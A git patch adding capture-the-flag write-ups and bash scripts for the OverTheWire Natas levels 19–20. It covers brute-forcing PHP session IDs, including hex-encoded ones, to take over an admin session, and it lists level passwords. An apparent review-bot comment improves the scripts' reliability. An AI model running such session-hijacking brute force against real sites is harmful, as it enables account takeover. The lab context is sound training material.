From 503a8a0c5c103f8e6484eca902e6d72c7c2f4672 Mon Sep 17 00:00:00 2001 From: Emile Clark-Boman Date: Wed, 16 Jul 2025 00:53:52 +1000 Subject: [PATCH] natas19.sh + writeup --- overthewire/natas/passwords.md | 94 +++++++++++++++++++++++++++- overthewire/natas/scripts/natas18.sh | 4 +- overthewire/natas/scripts/natas19.sh | 32 ++++++++++ 3 files changed, 125 insertions(+), 5 deletions(-) create mode 100755 overthewire/natas/scripts/natas19.sh diff --git a/overthewire/natas/passwords.md b/overthewire/natas/passwords.md index b958a6e..d779fa8 100644 --- a/overthewire/natas/passwords.md +++ b/overthewire/natas/passwords.md @@ -72,8 +72,29 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ Another oracle attack using an SQL injection AND this time using a timing based attack. NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]] -natas19: -natas20: +natas19: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr + PHP attempts to source `$_SESSION["PHPSESSID"]` from `$_GET`, `$_REQUEST`, and `$_COOKIE` + (maybe other's I don't remember exactly). Our session is based solely on + `$_COOKIE["PHPSESSID"]` and we know the program specifically uses 0-640 inclusive + session ID range. So we can bruteforce this and eventually we'll find + a session that is logged in as admin! + NOTE: see [[#Natas18 Solution Script|Appendix/"Natas18 Solution Script"]] +natas20: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw + Same exploit as for natas19 except now the session id isn't monotonic + restricted to inclusive range 0-640. Instead its hex encoded UTF-8. + Decode it to notice its in the format "-" where `` is + the same as for natas19. So we slightly modify our program and done! + Also remember from natas19 that the admin user has username `admin` + (which narrows down the brute force A LOT). You'll find success for `281-admin`. + NOTE: see [[#Natas19 Solution Script|Appendix/"Natas19 Solution Script"]] +natas21: +natas22: +natas23: +natas24: +natas25: +natas26: +natas27: + 
@@ -390,3 +411,72 @@ get_length LENGTH=$? exploit_oracle "$LENGTH" ``` + +###### Natas18 Solution Script +```bash +#!/usr/bin/env bash +USERNAME="admin" +PASSWORD="arbitrary" + +req() { + SESSION_ID=$1 + curl http://natas18.natas.labs.overthewire.org/index.php \ + -X POST \ + -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \ + -d "username=$USERNAME" \ + -d "password=$PASSWORD" \ + --cookie "PHPSESSID=$SESSION_ID" \ + -sS \ + | grep "Password: " +} + +MIN_ID=0 +MAX_ID=640 +for ((i=MIN_ID ; i <= MAX_ID ; i++)); do + printf "Attempt: %2d" $i + OUT=$(req "$i") + if [ $? -ne 0 ]; then + echo -en '\r' + else + echo " [admin]" + echo $OUT | awk '{print substr($2,1,32)}' + break + fi +done +``` + +###### Natas19 Solution Script +```bash +#!/usr/bin/env bash + +USERNAME="admin" +PASSWORD="arbitrary" + +req() { + local SESSION_ID=$1 + curl http://natas19.natas.labs.overthewire.org/index.php \ + -X POST \ + -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr \ + -d "username=$USERNAME" \ + -d "password=$PASSWORD" \ + --cookie "PHPSESSID=$SESSION_ID" \ + -sS \ + | grep "Password: " +} + +MIN_ID=0 +MAX_ID=640 +for ((i=MIN_ID ; i <= MAX_ID ; i++)); do + # encode integer id as hex `$_COOKIE["PHPSESSID"]` format + SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g') + printf "Attempt: %2d" $i + OUT=$(req "$SESSION_ID") + if [ $? -ne 0 ]; then + echo -en '\r' + else + echo " [admin]" + echo $OUT | awk '{print substr($2,1,32)}' + break + fi +done +``` diff --git a/overthewire/natas/scripts/natas18.sh b/overthewire/natas/scripts/natas18.sh index 7b9c2d6..9525cf3 100755 --- a/overthewire/natas/scripts/natas18.sh +++ b/overthewire/natas/scripts/natas18.sh @@ -1,12 +1,10 @@ #!/usr/bin/env bash -#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/ - USERNAME="admin" PASSWORD="arbitrary" req() { - SESSION_ID=$1 + local SESSION_ID=$1 curl http://natas18.natas.labs.overthewire.org/index.php \ -X POST \ -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \ 
diff --git a/overthewire/natas/scripts/natas19.sh b/overthewire/natas/scripts/natas19.sh
new file mode 100755
index 0000000..536beee
--- /dev/null
+++ b/overthewire/natas/scripts/natas19.sh
@@ -0,0 +1,32 @@
+#!/usr/bin/env bash
+
+USERNAME="admin"
+PASSWORD="arbitrary"
+
+req() {
+ local SESSION_ID=$1
+ curl http://natas19.natas.labs.overthewire.org/index.php \
+ -X POST \
+ -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr \
+ -d "username=$USERNAME" \
+ -d "password=$PASSWORD" \
+ --cookie "PHPSESSID=$SESSION_ID" \
+ -sS \
+ | grep "Password: "
+}
+
+MIN_ID=0
+MAX_ID=640
+for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
+ # encode integer id as hex `$_COOKIE["PHPSESSID"]` format
+ SESSION_ID=$(echo -n "$i-$USERNAME" | od -A n -t x1 | sed 's/ *//g')
+ printf "Attempt: %2d" $i
+ OUT=$(req "$SESSION_ID")
+ if [ $? -ne 0 ]; then
+ echo -en '\r'
+ else
+ echo " [admin]"
+ echo $OUT | awk '{print substr($2,1,32)}'
+ break
+ fi
+done
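Review bot: The status tested by `if [ $? -ne 0 ]` is grep's, so inside `req` a failed curl request (timeout, connection reset, or an error page with `-sS` and no `--fail`) is indistinguishable from "this session is not admin": the loop prints `\r` and moves on, and one transient failure can silently skip the single ID that would have matched. Capturing the curl body before grepping, as below, gives the caller a distinct status for request failure so it can stop or retry instead of continuing. The natas18.sh hunk above appears to share the pattern, judging by the copy of that script in the passwords.md hunk, though its `req` body is cut off in its own hunk. Separately, `od -A n -t x1` wraps its output every 16 bytes and `sed 's/ *//g'` only strips spaces within a line, so the encoding works only while `"$i-$USERNAME"` stays short; `tr -d ' \n'` in place of the sed removes that dependency on the username length.
```shell
req() {
  local SESSION_ID=$1
  local body
  body=$(curl http://natas19.natas.labs.overthewire.org/index.php \
    -X POST -u natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr \
    -d "username=$USERNAME" -d "password=$PASSWORD" \
    --cookie "PHPSESSID=$SESSION_ID" -sS) || return 2   # 2 = request failed
  grep "Password: " <<<"$body"                          # 1 = no match
}
# … unchanged: USERNAME/PASSWORD, MIN_ID/MAX_ID, loop header, SESSION_ID encoding …
  OUT=$(req "$SESSION_ID"); rc=$?
  if (( rc == 2 )); then
    printf '\nrequest for id %d failed\n' "$i" >&2
    exit 1
  elif (( rc != 0 )); then
    printf '\r'
  else
# … unchanged: success branch and loop end …
```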